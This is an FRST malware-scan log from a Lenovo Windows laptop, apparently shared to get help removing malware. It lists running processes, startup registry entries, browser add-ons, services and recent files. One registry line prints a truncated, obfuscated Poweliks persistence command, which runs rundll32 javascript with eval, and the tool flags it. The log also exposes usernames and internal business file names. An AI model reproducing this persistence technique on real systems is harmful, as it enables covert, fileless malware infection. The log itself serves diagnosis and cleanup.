(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\APSDaemon.exe
(Dolby Laboratories Inc.) C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Professional 7\PdfPro7Hook.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\PccNtMon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(dotSyntax, LLC) C:\Program Files (x86)\Digsby\lib\digsby-app.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google) C:\Users\hstagner\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
() C:\Program Files (x86)\Digsby\lib\aspell\bin\aspell.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\PccNt.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(UltraVNC) C:\Windows\Temp\winvnc.exe
(UltraVNC) C:\Windows\Temp\winvnc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Alexander Roshal) C:\Program Files\WinRAR\WinRAR.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2832168 2011-09-30] (Synaptics Incorporated)
HKLM\...\Run: [TpShocks] => C:\Windows\SYSTEM32\TpShocks.exe [380776 2011-03-29] (Lenovo.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [41320 2011-04-04] (Lenovo Group Limited)
HKLM\...\Run: [ALCKRESI.EXE] => C:\Program Files\Lenovo\AutoLock\ALCKRESI.EXE [281448 2011-02-28] (Lenovo Group Limited)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2010-12-14] (Conexant systems, Inc.)
HKLM-x32\...\Run: [RotateImage] => C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe [55808 2008-10-30] (Ricoh co.,Ltd.)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2010-11-16] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [112152 2011-01-16] (Intel Corporation)
HKLM-x32\...\Run: [PWMTRV] => rundll32 C:\PROGRA~2\ThinkPad\UTILIT~1\PWMTR64V.DLL,PwrMgrBkGndMonitor
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [Nuance PDF Converter Professional 7-reminder] => C:\Program Files (x86)\Nuance\PDF Professional 7\Ereg\Ereg.exe [333672 2011-09-06] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe [506712 2011-02-03] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [PDF7 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Professional 7\RegistryController.exe [141160 2011-09-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFProHook] => C:\Program Files (x86)\Nuance\PDF Professional 7\pdfpro7hook.exe [1787752 2011-11-03] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-01-20] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [OfficeScanNT Monitor] => C:\Program Files (x86)\Trend Micro\Client Server Security Agent\pccntmon.exe [2853424 2014-03-18] (Trend Micro Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-01-20] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-04] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [Google Update] => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-09-18] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [GoogleChromeAutoLaunch_794684615F8C6D6025E9826895DA1B35] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-21] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [Box Edit] => C:\Users\hstagner\AppData\Local\Box\Box Edit\Box Edit.exe [481816 2014-07-24] (Box)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\MountPoints2: {a4607ac7-eec1-11e0-ad47-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-2926875163-4226794389-2330185411-1140\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-04] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1140\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1140\...\MountPoints2: {a4607ac7-eec1-11e0-ad47-806e6f6e6963} - Q:\LenovoQDrive.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CrashPlan Tray.lnk
ShortcutTarget: CrashPlan Tray.lnk -> C:\Program Files\CrashPlan\CrashPlanTray.exe (Code 42 Software, Inc.)
Startup: C:\Users\jmccullough\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Digsby.lnk
ShortcutTarget: Digsby.lnk -> C:\Program Files (x86)\Digsby\digsby.exe ()
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/ig?brand=LENP&bmod=LENP
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll (Symantec Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg32.dll (Trend Micro Inc.)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\PlusIEContextMenu.dll (Zeon Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll (Symantec Corporation)
BHO-x32: ZeonIEEventHelper Class -> {DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll (Zeon Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: TBSB07898 Class -> {FCBCCB87-9224-4B8D-B117-F56D924BEB18} -> C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - DocuCom PDF - {E3286BF1-E654-42FF-B4A6-5E111731DF6B} - C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll (Zeon Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Coupons.com CouponBar - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
Toolbar: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-2926875163-4226794389-2330185411-1140 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {55963676-2F5E-4BAF-AC28-CF26AA587566} https://thinkasg.thinkasg.com/CACHE/stc/1/binaries/vpnweb.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg32.dll (Trend Micro Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\hstagner\AppData\Roaming\Mozilla\Firefox\Profiles\wzygs4sr.default-1398197978032
FF DefaultSearchEngine: Bing 
FF SearchEngineOrder.3: Bing 
FF SelectedSearchEngine: Bing 
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_12_0_0_77.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: ZEON/PDF,version=2.0 -> C:\Program Files (x86)\Nuance\PDF Professional 7\bin\nppdf.dll (Zeon Corporation)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @citrixonline.com/appdetectorplugin -> C:\Users\hstagner\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @talk.google.com/GoogleTalkPlugin -> C:\Users\hstagner\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @talk.google.com/O1DPlugin -> C:\Users\hstagner\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @tools.google.com/Google Update;version=3 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @tools.google.com/Google Update;version=9 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: box.com/BoxEdit -> C:\Users\hstagner\AppData\Local\Box\Box Edit\npBoxEdit.dll (Box)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\hstagner\AppData\Roaming\mozilla\plugins\npatgpc.dll (Cisco WebEx LLC)
FF Plugin ProgramFiles/Appdata: C:\Users\hstagner\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\hstagner\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Users\hstagner\AppData\Roaming\Mozilla\Firefox\Profiles\wzygs4sr.default-1398197978032\searchplugins\bingp.xml
FF HKLM-x32\...\Firefox\Extensions: [VIP@verisign.com] - C:\Program Files (x86)\Symantec\VIP Access Client
FF Extension: Symantec VIP Access Add-On - C:\Program Files (x86)\Symantec\VIP Access Client [2011-10-04]
FF HKLM-x32\...\Firefox\Extensions: [{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}] - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi
FF Extension: Coupons.com CouponBar - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi [2014-03-12]
FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension
FF Extension: Trend Micro NSC Firefox Extension - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension [2014-08-18]
 
Chrome: 
=======
CHR Profile: C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-08]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
CHR Extension: (Coupons.com Toolbar) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpkmcjgpcihgfnkcjapiaabbbplkcmf [2014-05-15]
CHR Extension: (Cisco WebEx Extension) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma [2014-10-22]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-06]
CHR Extension: (Google Wallet) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-09]
CHR HKLM-x32\...\Chrome\Extension: [cnpkmcjgpcihgfnkcjapiaabbbplkcmf] - C:\Program Files (x86)\Coupons.com CouponBar\chrome\Coupons.com.crx [2013-07-15]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [177648 2014-03-28] (Coupons.com Inc.)
R2 CrashPlanService; C:\Program Files\CrashPlan\CrashPlanService.exe [222720 2013-08-15] (CrashPlan) [File not signed]
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [477032 2011-03-23] (Lenovo.)
R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [93032 2010-04-07] (Lenovo Group Limited)
R2 MerakiPCCAgent; C:\Program Files (x86)\Meraki\PCC Agent 1.0.87\m_agent_service.exe [3103317 2013-11-19] () [File not signed]
R3 MerakiVNCService; C:\Windows\TEMP\winvnc.exe [2048248 2013-09-21] (UltraVNC)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 ntrtscan; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\ntrtscan.exe [1793424 2014-06-23] (Trend Micro Inc.)
R2 PDFProFiltSrv; C:\Program Files (x86)\Nuance\PDF Professional 7\PDFProFiltSrv.exe [135016 2011-09-09] (Nuance Communications, Inc.)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2011-09-01] (Lenovo Group Limited)
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-26] (Lenovo Group Limited) [File not signed]
R2 svcGenericHost; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe [51760 2014-03-31] (Trend Micro Inc.)
R2 svctcom; C:\Windows\SysWOW64\svctcom.exe [283264 2014-08-05] (Birch Grove Software, Inc.)
R3 TMBMServer; C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe [571928 2013-10-23] () [File not signed]
R2 tmlisten; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmlisten.exe [1998080 2014-07-23] (Trend Micro Inc.)
R3 TmProxy; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmProxy.exe [927768 2013-10-14] (Trend Micro Inc.)
R2 TSM Client Scheduler; C:\Program Files\Tivoli\TSM\baclient\dsmcsvc.exe [24791064 2010-04-27] (IBM Corporation)
R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed]
R2 VIPAppService; C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [84088 2011-04-13] (Symantec Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2011-10-04] ()
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R3 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [85376 2013-08-29] () [File not signed]
R1 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [175528 2013-09-02] () [File not signed]
R3 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [65336 2013-08-29] () [File not signed]
R2 TmFilter; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmXPFlt.sys [344864 2013-08-14] (Trend Micro Inc.)
R2 TmPreFilter; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmPreFlt.sys [42272 2013-08-14] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [109080 2013-01-09] (Trend Micro Inc.)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-09-24] (Lenovo (United States) Inc.)
R2 VSApiNt; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\VSApiNt.sys [2260768 2013-08-14] (Trend Micro Inc.)
U3 tmpfw; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-14 12:50 - 2014-11-14 12:50 - 00000000 ____D () C:\FRST
2014-11-14 12:49 - 2014-11-14 12:50 - 00000000 ____D () C:\Users\hstagner\Downloads\Malware fix (2)
2014-11-14 12:47 - 2014-11-14 12:47 - 00000000 ____D () C:\Users\hstagner\AppData\Roaming\WinRAR
2014-11-14 12:46 - 2014-11-14 12:46 - 00000000 ____D () C:\Users\hstagner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-11-14 12:46 - 2014-11-14 12:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-11-14 12:46 - 2014-11-14 12:46 - 00000000 ____D () C:\Program Files\WinRAR
2014-11-14 12:45 - 2014-11-14 12:45 - 01943248 _____ () C:\Users\hstagner\Downloads\winrar-x64-52b3.exe
2014-11-14 12:44 - 2014-11-14 12:44 - 01956057 _____ () C:\Users\hstagner\Downloads\Malware fix (2).rar
2014-11-14 12:42 - 2014-11-14 12:42 - 01956057 _____ () C:\Users\hstagner\Downloads\Malware fix (1).rar
2014-11-14 12:41 - 2014-11-14 12:41 - 01956057 _____ () C:\Users\hstagner\Downloads\Malware fix.rar
2014-11-14 11:31 - 2014-11-14 11:31 - 00195206 _____ () C:\Users\hstagner\AppData\Local\ars.cache
2014-11-14 11:31 - 2014-11-14 11:31 - 00153703 _____ () C:\Users\hstagner\AppData\Local\census.cache
2014-11-14 11:24 - 2014-11-14 11:24 - 00000010 _____ () C:\Users\hstagner\AppData\Local\sponge.last.runtime.cache
2014-11-14 11:17 - 2014-11-14 11:31 - 00000036 _____ () C:\Users\hstagner\AppData\Local\housecall.guid.cache
2014-11-14 11:17 - 2014-11-14 11:17 - 02476596 _____ (Trend Micro Inc.) C:\Users\hstagner\Downloads\HousecallLauncher64 (1).exe
2014-11-14 11:16 - 2014-11-14 11:16 - 02476596 _____ (Trend Micro Inc.) C:\Users\hstagner\Downloads\HousecallLauncher64.exe
2014-11-13 15:52 - 2014-11-13 15:52 - 00016024 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r4 - 3YR 24x7 (1).htm
2014-11-13 15:20 - 2014-11-13 15:20 - 00309760 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_DOUG SHARP XIV 325TB X2 _SVC 500TB LIC OPTION NOV 2014.xls
